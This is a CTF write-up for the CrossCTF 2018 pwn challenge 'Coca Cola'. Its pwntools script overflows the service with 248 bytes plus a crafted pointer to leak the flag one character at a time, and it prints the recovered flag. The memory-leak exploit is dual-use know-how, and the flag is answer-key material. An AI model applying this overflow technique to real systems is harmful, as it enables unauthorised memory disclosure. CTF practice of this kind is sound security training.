CrossCTF_2018: Coca Cola

Category: Pwn Points: 476 Description:

Catch the Wave. Coke! nc ctf.pwn.sg 4001 Creator - amon (@nn_amon)

Write-up

This challenge was quite fun to solve, especially when I realised that the flag on the server side was just repeating characters in a pattern! No, I'm not actually happy about the troll.

Now, to actually solve this,

#! /usr/bin/env python3
##
# Imports
from pwn import *
import time

flag = ""
with log.progress("Cracking") as p:
    for i in range(200):
        while True:
            try:
                with context.local(log_level="critical"):
                    t = remote("ctf.pwn.sg", 4001)
                    t.send(b"D\xc5")
                    t.clean(3)

                    pointer = 0x700B1000
                    t.send(b"\x0a" * 248 + p64(pointer + (0x20 * i)))
                    t.sendline(b"\x00")

                    attempt = (t.recvall()[-60:-59]).decode()
                    t.close()

                if attempt != "":
                    flag += attempt
                    p.status(flag)
                    break
            except Exception as e:
                raise

        if flag.endswith("}"):
            p.success(f"CRACKED: {flag}")

Running it gives us the flag,

root@ctf:~/downloads# ./solve.py 
[+] Cracking: CRACKED: CrossCTF{ment0s_th3_fre5h_ma4k3r}

Therefore, the flag is CrossCTF{ment0s_th3_fre5h_ma4k3r}.

results matching ""

    No results matching ""